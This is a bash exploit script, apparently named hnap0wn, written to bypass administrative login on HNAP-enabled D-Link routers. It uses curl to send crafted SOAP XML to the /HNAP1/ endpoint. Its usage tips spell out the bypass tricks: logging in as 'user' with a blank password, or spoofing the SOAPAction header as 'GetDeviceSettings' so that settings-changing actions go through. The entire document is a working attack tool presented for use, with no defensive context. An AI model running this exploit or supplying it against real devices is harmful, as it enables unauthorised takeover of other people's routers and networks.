#!/bin/bash
###############################################################################################
# Description:
#
#	Administrative login bypass exploit for HNAP enabled D-Link routers.
#
# Usage:
#
#	./hnap0wn <user:password@ip:port> <xml file> [SOAPAction]
#
# Tips: 
#
#	1) Try logging in with user name of 'user' and a blank password:
#
#		./hnap0wn user:@192.168.0.1 xml/SetDeviceSettings.xml
#
#	2) Try specifying the 'GetDeviceSettings' SOAPAction for all actions:
#
#		./hnap0wn 192.168.0.1:8099 xml/SetDeviceSettings.xml GetDeviceSettings
#
###############################################################################################

if [ "$(which curl)" == "" ]; then
	echo -e "\nWARNING: curl not found! Make sure it is installed and in your PATH.\n" 1>&2
fi

if [ "$2" == "" ]; then
	echo -e "\nUsage:    $0 <user:password@ip:port> <xml file> [SOAPAction]\n" 1>&2
	echo -e "\nExamples: $0 192.168.0.1:8099 xml/GetWLanSecurity.xml GetDeviceSettings" 1>&2
	echo -e "          $0 user:@192.168.0.1 xml/GetWLanSecurity.xml\n" 1>&2 
	exit
fi

TARGET=$1
FILE=$2
ACTION=$3

#If no action name was explicitly set, use the default (file name minus extension)
if [ "$ACTION" == "" ]; then
	ACTION=$(echo $FILE | sed -e "s/^.*\///" | cut -d'.' -f1)
fi

#Make sure the specified file exists
if [ ! -e $FILE ]; then
	echo -e "\nERROR: '$FILE' not found!\n" 1>&2
	exit
fi

echo ""
curl --insecure --header "SOAPAction: \"http://purenetworks.com/HNAP1/$ACTION\"" -d "$(cat $FILE)" http://$TARGET/HNAP1/
echo -e "\n"
